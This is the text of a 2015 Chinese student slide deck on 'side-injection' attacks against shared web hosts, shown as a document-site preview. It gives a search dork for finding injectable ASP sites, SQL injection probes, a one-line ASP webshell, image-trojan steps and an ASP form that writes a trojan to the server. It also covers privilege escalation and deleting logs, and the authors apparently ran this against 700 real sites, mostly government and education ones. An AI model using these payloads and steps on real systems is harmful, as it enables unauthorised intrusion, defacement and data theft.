2015作業(yè)提交17旁注技術(shù)_第1頁(yè)
2015作業(yè)提交17旁注技術(shù)_第2頁(yè)
2015作業(yè)提交17旁注技術(shù)_第3頁(yè)
2015作業(yè)提交17旁注技術(shù)_第4頁(yè)
2015作業(yè)提交17旁注技術(shù)_第5頁(yè)
已閱讀5頁(yè),還剩15頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

旁注技術(shù)分析及實(shí)驗(yàn)成員:王嘉春2015140233姚凱2015140234李通2015140235陳義璟2015140237旁注簡(jiǎn)介:旁注是互聯(lián)網(wǎng)黑客入侵常見(jiàn)的一種手段,多數(shù)用來(lái)攻擊虛擬主機(jī)。其原理是利用同一主機(jī)上其他站點(diǎn)的安全漏洞獲取服務(wù)器上的一個(gè)webshell(web后門(mén)程序),從而獲取一定的服務(wù)器操作權(quán)限,進(jìn)而利用虛擬目錄權(quán)限的配置不嚴(yán)格或者“提權(quán)”攻擊獲取管理員權(quán)限后在跳轉(zhuǎn)到目標(biāo)網(wǎng)站的web虛擬目錄中。旁注簡(jiǎn)介:網(wǎng)絡(luò)拓?fù)洌号宰⒑?jiǎn)介:同一個(gè)服務(wù)器的IP地址是固定的,主機(jī)S通常會(huì)注冊(cè)管理眾多的域名,通過(guò)WHOIS反查可以得到與要攻擊的網(wǎng)站A處于同一服務(wù)器的其他網(wǎng)站的域名,以此決定下一步的攻擊目標(biāo)。旁注簡(jiǎn)介:實(shí)驗(yàn)工具:網(wǎng)站工具:?注入點(diǎn)掃描:御劍1.5注入測(cè)試:Domain

4.3BSQL

hacker

0909腳本上傳:中國(guó)菜刀實(shí)驗(yàn)步驟:通過(guò)注入點(diǎn)掃描收集可以進(jìn)行注入的網(wǎng)站集入侵傀儡網(wǎng)站B上傳木馬,拿到服務(wù)器S的部分權(quán)限進(jìn)入本次攻擊的目標(biāo)網(wǎng)站A,實(shí)施攻擊清理入侵痕跡,刪除日志文件實(shí)驗(yàn)過(guò)程:收集可入侵網(wǎng)站使用搜索引擎(百度,bing,google)查詢Inurl:asp?id=找到有可能用來(lái)注入的.asp或.php網(wǎng)站類似查詢語(yǔ)句還有很多實(shí)驗(yàn)過(guò)程:掃描注入點(diǎn)在url后輸入:and

1=1and

1=2網(wǎng)頁(yè)正常顯示網(wǎng)頁(yè)出錯(cuò)說(shuō)明這個(gè)網(wǎng)站可以注入本次收集到700個(gè)網(wǎng)站可注入地址145個(gè)實(shí)驗(yàn)過(guò)程掃描注入點(diǎn)手工驗(yàn)證是否可以注入實(shí)驗(yàn)過(guò)程:注入檢測(cè)猜解表名,列名猜解后臺(tái)管理員賬號(hào)密碼“猜”的過(guò)程需要一些運(yùn)氣實(shí)驗(yàn)過(guò)程:密碼破解網(wǎng)站密碼一般都會(huì)加密,以MD5居多,還有SHA-1、DES、CRC等破解密碼的網(wǎng)站(收費(fèi))?····

···實(shí)驗(yàn)過(guò)程:獲取網(wǎng)站后臺(tái)管理入口后臺(tái)地址也是用自己的地址庫(kù)去匹配實(shí)驗(yàn)過(guò)程:登錄后臺(tái)管理系統(tǒng)實(shí)驗(yàn)過(guò)程:上傳木馬實(shí)驗(yàn)過(guò)程:圖片木馬制作新建一個(gè)1.asp,輸入<%eval

request(“value”)%>準(zhǔn)備一張圖片1.jpg運(yùn)行cmd,生成圖片木馬a:ASKII碼文件b:二進(jìn)制文件實(shí)驗(yàn)過(guò)程:圖片木馬制作實(shí)驗(yàn)過(guò)程:服務(wù)器提權(quán)<form

action=

method=post><textarea

name=value

cols=120

rows=10

width=45>set

lP=server.createObject("Adodb.Stream")lP.OpenlP.Type=2//以文本方式lP.CharSet="gb2312"lP.writetext

request("newvalue")lP.SaveToFile

server.mappath("newmm.asp"),2//將木馬內(nèi)容以覆蓋文件的方式寫(xiě)入newmm.asplP.Closeset

lP=nothingresponse.redirect

"newmm.asp"</textarea><textarea

name=newvalue

cols=120

rows=10

width=45>添入生成木馬的內(nèi)容</textarea><BR><center><br><input

type=submit

value=提交></form>實(shí)驗(yàn)過(guò)程:進(jìn)入目標(biāo)網(wǎng)站A的組織目錄獲取所需信息不要隨意修改別人的網(wǎng)站清理瀏覽痕跡總結(jié)與反思:實(shí)驗(yàn)中收集的傀儡網(wǎng)站大抵以政府機(jī)關(guān),教育機(jī)構(gòu)居多,真切希望國(guó)家能夠在公共事業(yè)中做的更細(xì)致一些。平時(shí)在學(xué)習(xí)和工作之余,多接觸一些網(wǎng)站研發(fā)和運(yùn)行的機(jī)制,以及各種關(guān)系型數(shù)據(jù)庫(kù)的結(jié)構(gòu)和SQL查詢語(yǔ)句的使用,及時(shí)更新自己的資料庫(kù)。使用各種漏洞

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論